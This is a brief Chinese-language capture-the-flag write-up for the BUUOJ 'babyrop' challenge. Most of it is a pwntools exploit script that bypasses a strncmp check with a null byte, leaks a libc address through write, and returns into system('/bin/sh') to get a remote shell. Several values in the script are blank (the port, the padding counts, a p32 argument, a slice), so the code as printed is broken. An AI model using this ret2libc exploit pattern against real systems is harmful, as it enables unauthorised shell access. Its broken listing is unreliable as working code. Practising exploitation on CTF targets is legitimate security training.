拖入ida
先用strncmp使一个随机数与输入比对,这里可以用\x00跳过strncmp
然后read()中的a1是我们输入\x00后的值
写exp
from pwn import *
sh=remote('node1.buuoj.cn',)
#sh=process('/home/harmonica/Desktop/oppo/rop/babyrop')
elf=ELF('/home/harmonica/Desktop/oppo/rop/babyrop')
libc=ELF('/home/harmonica/Desktop/oppo/rop/libc-2.23.so')
bin_sh_off=0x0015902b
system_off=0x0003a940
write_plt = elf.plt['write']
write_got = elf.got['write']
main=0x08048825
payload='\x00'+'\xff'*
sh.sendline(payload)
sh.recvuntil('Correct\n')
payload='a'*0xe7+'bbbb'+p32(write_plt)+p32(main)+p32()+p32(write_got)
sh.sendline(payload)
write_addr = u32(sh.recv()[:])
libcbase = write_addr - libc.sym['write']
log.success("libcbase: "+hex(libcbase))
system_addr = libcbase + system_off
binsh_addr = libcbase + bin_sh_off
payload='\x00'+'\xff'*
sh.sendline(payload)
sh.recvuntil('Correct\n')
payload='a'*0xe7+'bbbb'+p32(system_addr)+'bbbb'+p32(binsh_addr)
sh.sendline(payload)
sh.interactive()
得到flag
手机扫一扫
移动阅读更方便
你可能感兴趣的文章